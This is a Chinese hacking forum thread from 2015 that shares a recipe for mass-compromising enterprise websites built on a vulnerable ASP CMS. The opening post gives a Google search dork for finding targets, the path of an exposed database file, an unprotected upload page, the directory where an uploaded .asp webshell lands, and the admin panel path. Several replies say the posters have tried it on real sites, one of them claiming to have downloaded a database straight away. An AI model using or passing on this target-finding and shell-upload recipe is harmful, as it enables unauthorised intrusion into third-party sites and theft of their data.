漏洞批量通杀企业站拿shell

466889470 · 发表于 2015-3-19 20:20:55

通杀企业站

google关键字：inurl:product_show.asp?action=common

数据库地址：db/%23ruiutend%26anxiu.mdb

上传地址：manage/admin_flash.asp

上传后目录：uploadfiles/ProductImages/2014-1/PA2014130175659.asp

后台：manage/main.asp

笑面人 · 发表于 2015-3-19 22:35:38

谢谢分享！

heiwu98 · 发表于 2015-3-20 06:18:50

多谢楼主的分享，本人要去试试。。

Charlotte · 发表于 2015-3-20 09:38:23

cool 谢谢楼主
学习了

darkness · 发表于 2015-3-20 10:28:53

给力。。。。刚试验了一下。很多站都可以

gscsd · 发表于 2015-3-20 11:10:26

叼，我的大刀已经饥渴难耐了。。。。。准备测试。。

000 · 发表于 2015-3-20 16:19:38

谢谢楼主

淘淘00小宇 · 发表于 2015-3-20 16:34:59

给力！随便试了下，第一个站就把库搞下来了。{:soso_e179:}

顶你个肺 · 发表于 2015-3-20 18:18:24

学习了，XX

clocks · 发表于 2015-3-20 18:34:23

这个漏洞还是有很多网站是没有补的。还能挖掘挖掘。。。。有兴趣的可以去研究一下

漏洞批量通杀企业站拿shell

评分

指导单位

旗下站点

联系我们